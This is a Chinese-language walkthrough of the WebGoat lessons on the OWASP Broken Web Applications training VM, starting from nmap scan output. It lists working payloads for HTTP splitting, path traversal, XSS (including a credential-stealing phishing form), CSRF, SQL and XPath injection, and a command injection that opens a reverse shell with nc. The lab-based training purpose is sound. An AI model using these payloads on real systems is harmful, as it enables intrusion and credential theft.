owaspbwa之WebGoat

大家好，欢迎来到IT知识分享网。

简介

 下载：https://sourceforge.net/projects/owaspbwa/files/

GitHub: https://github.com/chuckfw/owaspbwa/wiki/UserGuide

0x001 侦查

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 ea:83:1e:45:5a:a6:8c:43:1c:3c:e3:18:dd:fc:88:a5 (DSA)
|_  2048 3a:94:d8:3f:e0:a2:7a:b8:c3:94:d7:5e:00:55:0c:a7 (RSA)
80/tcp   open  http        Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
|_http-title: owaspbwa OWASP Broken Web Applications
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Courier Imapd (released 2008)
|_imap-capabilities: UIDPLUS THREAD=ORDEREDSUBJECT THREAD=REFERENCES completed IDLE QUOTA OK CAPABILITY ACL ACL2=UNIONA0001 CHILDREN IMAP4rev1 SORT NAMESPACE
443/tcp  open  ssl/https?
|_ssl-date: 2018-12-17T06:55:14+00:00; 0s from scanner time.
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
5001/tcp open  java-rmi    Java RMI
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Site doesn't have a title.
8081/tcp open  http        Jetty 6.1.25
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Jetty(6.1.25)
|_http-title: Choose Your Path
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5001-TCP:V=7.70%I=7%D=12/17%Time=5C174849%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4,"\xac\xed\0\x05");
MAC Address: F4:B7:E2:01:6D:06 (Hon Hai Precision Ind.)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: OWASPBWA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

0x002 General

http服务器缓存利用 HTTP Splitting

#当对服务器发请求
HTTP/1.1 302 Moved Temporarily
Date: Mon, 17 Dec 2018 14:21:31 GMT
Server: Apache-Coyote/1.1
Location: http://192.168.1.104/WebGoat/attack?Screen=3&menu=100&fromRedirect=yes&language=en #重点在这
Content-Type: text/html;charset=ISO-8859-1
Via: 1.1 127.0.1.1
Vary: Accept-Encoding
Content-Length: 0
Connection: close

构造恶意代码

en%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0aInsert undesireable content here

en%0d%0aContent-length%3a+0%0d%0a%0d%0aHTTP%2f1.1+200+OK%0d%0aContent-Type%3a+text%2fhtml%3b%0d%0aLast-Modified%3a+Thu%2c+01+Jan+2099+12%3a00%3a00+GMT+%0d%0aContent-length%3a+19%0d%0a%0d%0a%26lt%3bhtml%26gt%3bhacked%26lt%3b%2fhtml%26gt%3b

0x003 Access Control Flaws

Bypass a Path Based Access Control Scheme

../../../../../../../etc/tomcat6/tomcat-users.xml

LAB: Role Based Access Control

employee_id=105&action=ViewProfile #登录后修改为 DeleteProfile

0x004

Stage 1: 绕过表示层访问控制(Bypass Presentational Layer Access Control)

Tom用户 小写密码登录  然后点击ViewProfile  抓包修改数据 让Tom用户拥有 DeleteProfile 权限

employee_id=105&action=ViewProfile修改为 DeleteProfile

Stage 2: 添加业务层的访问控制（Add Business Layer Access Control）

    要修改 org.owasp.webgoat.lessons.RoleBasedAccesControl.RoleBasedAccessContro l.java 类中的相关代码

    修改 handleRequest 方法

//***************CODE HERE************************* 
if(!isAuthorized(s, getUserId(s), requestedActionName))
{
 throw new UnauthorizedException();
}
//************************************************* 

Stage 3: 绕过数据层访问控制（Breaking Data Layer Access Control）

选择Tom小写密码tom登录   抓包修改为Jarry的ID 101

employee_id=105&action=ViewProfile  #id修改为101 

Stage 4: 添加数据层访问控制（Add Data Layer Access Control）

0x005  Ajax Security

基于 DOM 的跨站点访问（LAB: DOM‐Based cross‐site scripting）

STAGE 1:

<IMG SRC="images/logos/owasp.jpg"/>

STAGE 2:

<img src=x onerror=;;alert('XSS') />

STAGE 3:

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

STAGE 4:

Please enter your password:<BR><input type = "password" name="pass"/><button
onClick="javascript:alert('I have your password: ' +
pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR>
<BR><BR><BR><BR><BR><BR><BR><BR> 

DOM 注入（DOM Injection）

拦截数据 修改body内容

document.form.SUBMIT.disabled = false;

XML 注入（XML Injection）

<root>
<reward>WebGoat Core Duo Laptop 2000 Pts</reward>
<reward>WebGoat Hawaii Cruise 3000 Pts</reward> 
</root>

JSON 注入（JSON Injection）

burpsuite 设置 ： Proxy-Options-Intercept Server Response设置response拦截的选项：

拦截 修改 JSON数据

{
"From": "Boston",
"To": "Seattle", 
"flights": [
{"stops": "0", "transit" : "N/A", "price": "$600"}, //任意修改
{"stops": "2", "transit" : "Newark,Chicago", "price": "$300"} //任意修改 
]
}

静默交易攻击（Silent Transactions Attacks）

查看源代码  两个关键的 JavaScript 函数 function processData()   function submitData

//在页面的URL输入：
javascript:submitData(16666000,100000)

危险指令使用（Dangerous Use of Eval）

123');alert(document.cookie);(' 

不安全的客户端存储（Insecure Client Storage）

选择要购买的商品 burp抓包修改金额为0 

0x006 认证缺陷（Authentication Flaws）

基本认证（Basic Authentication）

Authorization
guest:guest

多级登录 1（Multi Level Login 1）

STAGE 1

//用户名密码登录
用户名：Jane，密码：tarzan
TAN 15648

STAGE 2

用户名：Jane，密码：tarzan
TAN 15648

burp拦截 hidden_ten值修改为1
hidden_tan=1&tan=15648&Submit=Submit 

0x008 缓冲区溢出（Buffer Overflows）

Off‐by‐One 缓冲区溢出（Off‐by‐One Overflows）

//随便填写
test
test
123
//request 请求拦截后发往 intruder
249.99+-+24+hours&SUBMIT=Accept+Terms&last_name=test&first_name=test&room_no=§123§
//character blocks 参数设置
base string: 3
min length: 1024
max length: 1024000
step: 1024 

0x009 代码质量（Code Quality）

在 HTML 中找线索（Discover Clues in the HTML） 

查看源代码中的注释可找到用户名密码

<!-- FIXME admin:adminpw  --><!-- Use Admin to regenerate database  -->

0x010 并发（Concurrency）

线程安全问题（Thread Safety Problems）

//两个用户， 浏览器打开两个相同页面 同时提交 会看到另个用户的信息
jeff
dave

购物车并发缺陷（Shopping Cart Concurrency Flaw）

选择要购买的产品，打开两个页面同时提交 

0x011 跨站脚本攻击（Cross‐Site Scripting (XSS)）

使用 XSS 钓鱼（Phishing with XSS） 可以使用Beef更加方便快捷

<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen. User Name
= " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new
Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";}
</script><form><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter
Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input
type="password" name = "pass"><br><input type="submit" name="login" value="login"
onclick="hack()"></form><br><br><HR>

跨站脚本攻击（LAB: Cross Site Scripting）

<script>alert(document.cookie);</script>

存储型 XSS 攻击（Stored XSS Attacks）

存储型XXS可以打站点后台，获得密码。如果结合beef威力更大

<script language="javascript" type="text/javascript">alert(document.cookie);</script>

跨站请求伪造（Cross Site Request Forgery (CSRF)）

<img src="http://localhost/WebGoat/attack?Screen=81&menu=210&transferFunds=5000" width="1"
height="1" />

绕过 CSRF 确认（ CSRF Prompt By‐Pass）

<img src="http://localhostattack?Screen=81&menu=210&transferFunds=5000"
onerror="document.getElementById('image2').src='http://localhostattack?Screen=81&menu=210&transf
erFunds=CONFIRM'" width="1" height="1" />
<img id="image2" width="1" height="1" /> 

跨站跟踪攻击（Cross Site Tracing (XST) Attacks）

<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new
ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false);
xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>");
document.write(str1);}</script>

0x012 不当的错误处理（Improper Error Handling）

打开认证失败方案（Fail Open Authentication Scheme）

burp拦截 删除password这项 

0x013 注入缺陷（Injection Flaws）

命令注入（Command Injection）

" 127.0.0.1 && nc -vn  192.168.1.101 4444 -e /bin/bash

数字型 SQL 注入（Numeric SQL Injection）

or 1=1

日志欺骗（Log Spoofing）

Smith%0d%0aLogin Succeeded for username: admin

XPATH 型注入（XPATH Injection）
 

Smith' or 1=1 or 'a'='a

字符串型注入（String SQL Injection）

' or 1=1 --

SQL 注入（LAB: SQL Injection）

smith' or '1' = '1

​​​​​​​